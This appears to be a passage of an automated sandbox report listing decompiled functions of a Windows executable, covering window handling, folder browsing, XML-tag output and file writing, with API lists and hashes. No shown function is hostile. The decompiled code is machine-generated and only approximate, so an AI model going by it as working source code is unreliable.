                                                                                                                            0x0040ac09
                                                                                                                            0x0040ac0f
                                                                                                                            0x0040ac12
                                                                                                                            0x0040ac4f

                                                                                                                            APIs
                                                                                                                            • BeginDeferWindowPos.USER32(00000003), ref: 0040ABBA
                                                                                                                              • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                              • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                              • Part of subcall function 00402E22: DeferWindowPos.USER32 ref: 00402EB4
                                                                                                                            • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                            • String ID: $
                                                                                                                            • API String ID: 2498372239-3993045852
                                                                                                                            • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                            • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                            • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                            • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                                                            0x00403a7d
                                                                                                                            0x00403a8c
                                                                                                                            0x00403a9c
                                                                                                                            0x00403aba
                                                                                                                            0x00403adf
                                                                                                                            0x00403ae7
                                                                                                                            0x00403af4
                                                                                                                            0x00403af4
                                                                                                                            0x00403ae7
                                                                                                                            0x00403aba
                                                                                                                            0x00403a9c
                                                                                                                            0x00403b13

                                                                                                                            APIs
                                                                                                                            • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                              • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                            • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: State$CallMessageProcSendWindow
                                                                                                                            • String ID: A
                                                                                                                            • API String ID: 3924021322-3554254475
                                                                                                                            • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                            • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                            • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                            • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                                                            0x004034f0
                                                                                                                            0x004034f8
                                                                                                                            0x00403506
                                                                                                                            0x00403516
                                                                                                                            0x0040351c
                                                                                                                            0x00403531
                                                                                                                            0x00403537
                                                                                                                            0x00403545
                                                                                                                            0x0040354a
                                                                                                                            0x00403556
                                                                                                                            0x00403567
                                                                                                                            0x00403575
                                                                                                                            0x00403583
                                                                                                                            0x00403583
                                                                                                                            0x00403586
                                                                                                                            0x00403592
                                                                                                                            0x00403598
                                                                                                                            0x004035ac

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                              • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                              • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                              • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                              • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                            • memset.MSVCRT ref: 00403537
                                                                                                                            • _ultow.MSVCRT ref: 00403575
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ??2@$memset$_ultow
                                                                                                                            • String ID: cf@$q
                                                                                                                            • API String ID: 3448780718-2693627795
                                                                                                                            • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                            • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                            • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                            • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 64%
                                                                                                                            			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                                                            0x00407e2d
                                                                                                                            0x00407e46
                                                                                                                            0x00407e48
                                                                                                                            0x00407e4d
                                                                                                                            0x00407e5f
                                                                                                                            0x00407e6b
                                                                                                                            0x00407e6f
                                                                                                                            0x00407e75
                                                                                                                            0x00407e7c
                                                                                                                            0x00407e7d
                                                                                                                            0x00407e88
                                                                                                                            0x00407e8d
                                                                                                                            0x00407e8e
                                                                                                                            0x00407eaa

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00407E48
                                                                                                                            • memset.MSVCRT ref: 00407E5F
                                                                                                                              • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                              • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                            • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                            • String ID: </%s>
                                                                                                                            • API String ID: 3400436232-259020660
                                                                                                                            • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                            • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                            • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                            • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                                                            0x00405e0a
                                                                                                                            0x00405e12
                                                                                                                            0x00405e18
                                                                                                                            0x00405e1c
                                                                                                                            0x00405e1e
                                                                                                                            0x00405e1e
                                                                                                                            0x00405e24
                                                                                                                            0x00405e2c
                                                                                                                            0x00405e2e
                                                                                                                            0x00405e44
                                                                                                                            0x00405e49
                                                                                                                            0x00405e4c
                                                                                                                            0x00405e4d
                                                                                                                            0x00405e68
                                                                                                                            0x00405e74
                                                                                                                            0x00405e74
                                                                                                                            0x00000000
                                                                                                                            0x00405e84
                                                                                                                            0x00405e8c

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                            • String ID: caption
                                                                                                                            • API String ID: 1523050162-4135340389
                                                                                                                            • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                            • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                            • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                            • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                                            0x00409a4a
                                                                                                                            0x00409a4f
                                                                                                                            0x00409a56
                                                                                                                            0x00409a5e
                                                                                                                            0x00409a60
                                                                                                                            0x00409a6e
                                                                                                                            0x00409a6e
                                                                                                                            0x00409a60
                                                                                                                            0x00409a71
                                                                                                                            0x00409a76
                                                                                                                            0x00000000
                                                                                                                            0x00409a78
                                                                                                                            0x00000000
                                                                                                                            0x00409a89

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                              • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                            • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                            • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                            • API String ID: 946536540-379566740
                                                                                                                            • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                            • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                            • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                            • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 93%
                                                                                                                            			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                            0x0040588e
                                                                                                                            0x0040588f
                                                                                                                            0x0040588f
                                                                                                                            0x00405892
                                                                                                                            0x00405896
                                                                                                                            0x004058a9
                                                                                                                            0x004058a9
                                                                                                                            0x004058ad
                                                                                                                            0x004058af
                                                                                                                            0x004058b5
                                                                                                                            0x004058b6
                                                                                                                            0x004058b9
                                                                                                                            0x004058c2
                                                                                                                            0x004058c3
                                                                                                                            0x004058c8
                                                                                                                            0x004058d2
                                                                                                                            0x004058d4
                                                                                                                            0x004058d9
                                                                                                                            0x004058e0
                                                                                                                            0x004058ea
                                                                                                                            0x004058ec
                                                                                                                            0x004058ed
                                                                                                                            0x004058f2
                                                                                                                            0x004058f9
                                                                                                                            0x00405902
                                                                                                                            0x00405898
                                                                                                                            0x00405898
                                                                                                                            0x0040589a
                                                                                                                            0x0040589c
                                                                                                                            0x004058a1
                                                                                                                            0x004058a2
                                                                                                                            0x004058a5
                                                                                                                            0x004058a7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004058a7
                                                                                                                            0x00405912
                                                                                                                            0x00405915
                                                                                                                            0x0040591e
                                                                                                                            0x0040591e
                                                                                                                            0x00405907
                                                                                                                            0x0040590b

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ??2@??3@memcpymemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1865533344-0
                                                                                                                            • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                            • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                            • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                            • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 37%
                                                                                                                            			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                                            0x0040ad06
                                                                                                                            0x0040ad0a
                                                                                                                            0x0040ad0c
                                                                                                                            0x0040ad14
                                                                                                                            0x0040ad19
                                                                                                                            0x0040ad1f
                                                                                                                            0x0040ad23
                                                                                                                            0x0040ad27
                                                                                                                            0x0040ad2a
                                                                                                                            0x0040ad2d
                                                                                                                            0x0040ad34
                                                                                                                            0x0040ad3b
                                                                                                                            0x0040ad3e
                                                                                                                            0x0040ad44
                                                                                                                            0x0040ad48
                                                                                                                            0x0040ad4a
                                                                                                                            0x0040ad52
                                                                                                                            0x0040ad5a
                                                                                                                            0x0040ad64
                                                                                                                            0x0040ad65
                                                                                                                            0x0040ad6b
                                                                                                                            0x0040ad6c
                                                                                                                            0x0040ad73
                                                                                                                            0x0040ad76
                                                                                                                            0x0040ad7c
                                                                                                                            0x0040ad7c
                                                                                                                            0x0040ad7f
                                                                                                                            0x0040ad84

                                                                                                                            APIs
                                                                                                                            • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                            • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3917621476-0
                                                                                                                            • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                            • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                            • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                            • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                            0x00404a62
                                                                                                                            0x00404a6a
                                                                                                                            0x00404a6e
                                                                                                                            0x00404a71
                                                                                                                            0x00404a74
                                                                                                                            0x00404a92
                                                                                                                            0x00404a92
                                                                                                                            0x00404a76
                                                                                                                            0x00404a76
                                                                                                                            0x00404a87
                                                                                                                            0x00404a90
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404a90
                                                                                                                            0x00404aa3
                                                                                                                            0x00404aa7
                                                                                                                            0x00404aa7
                                                                                                                            0x00404a94
                                                                                                                            0x00404a98

                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32 ref: 00404A52
                                                                                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Item
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3888421826-0
                                                                                                                            • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                            • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                            • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                            • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 93%
                                                                                                                            			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                                            0x004072e0
                                                                                                                            0x004072f7
                                                                                                                            0x004072fd
                                                                                                                            0x00407316
                                                                                                                            0x00407342

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 004072FD
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                            • strlen.MSVCRT ref: 00407328
                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                            Memory Dump Source
